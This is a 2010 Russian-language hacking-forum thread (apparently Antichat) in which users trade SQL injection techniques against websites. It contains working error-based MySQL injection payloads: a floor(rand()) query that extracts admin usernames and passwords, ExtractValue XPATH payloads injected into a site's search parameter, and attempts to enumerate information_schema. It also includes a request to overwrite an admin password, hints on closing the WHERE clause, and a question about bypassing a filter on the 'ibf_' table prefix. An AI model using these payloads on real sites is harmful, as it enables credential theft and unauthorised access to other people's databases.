 |
|
03.07.2010, 14:44
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Iggy
load_file()?!
Si tacuisses, philosophus mansisses (Boetius)
|
|
|
03.07.2010, 15:50
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
С нами:
9012765
Репутация:
1
|
|
Имеется запрос:
Код:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password. |
|
|
|
03.07.2010, 16:10
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
Сообщение от Rabben
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
имеешь ввиду "update admins set password=......" ?
насколько я знаю, комбинировать запросы select и update нельзя
|
|
|
|
03.07.2010, 16:18
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
|
|
|
|
03.07.2010, 16:22
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Rabben
Имеется запрос:
Код:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password. если бы можно было запросом из браузера изменять значения в БД, то я думаю % похеканных сайтов стал намного больше, и раздел рашифровка хешей не нужен был бы совсем...
|
|
|
|
03.07.2010, 16:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Cybersteger
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
да что же такое? откуда вы все нарисовались с такими умными вопросами? почитай-ка клац
|
|
|
|
03.07.2010, 16:39
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
мда чел .. я это читал и нераз, помогало, но не в этом случае, я хз как здесь делать, комментарием после WHERE (ti.parent_id=2 order by 1/* OR ti.tr_id=2 order by 1/*) (-- ,+--+,#...) нелзя закрыть, а в пидзапросах полохо понимаю потому и запостив мб кто-то знает (мне кажется здесь должен быть пидзапрос).
|
|
|
|
03.07.2010, 17:27
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
Тебе нужен примерно такой результат: WHERE (ti.parent_id=2) order by 1/*
Подсказка есть - пробуй.
|
|
|
|
03.07.2010, 19:18
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
ага ) (site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(user())))--)
MySQL Error : XPATH syntax error: '\user@127.0.0.2'
только теперь непонятно, версия 5.1.41 , а infromation_schema будто нет что это?
site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(select+schema_ name+from+infromation_schema.schemata+limit+1,1)))--
MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata'
.....ExtractValue(1,concat(0x5c,(select+schema_nam e+from+infromation_schedasdma.schemata+limit+1,1)) )--
MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' --одинаково потому и думаю что infromation_schema нет
|
|
|
|
03.07.2010, 19:24
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
вобщем есть запрос на выборку из таблы ibf_members
символ "_"(в имени таблицы) заменяется на "ampersand#95;"
и только в тех случаях, когда в строке(имя таблицы) есть "ibf_".
в остальных случаях "_" проходит.
Есть мысли? И как возможно это обойти?
Спасибо.
//пробовал с помощью подзапроса - не вышло.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
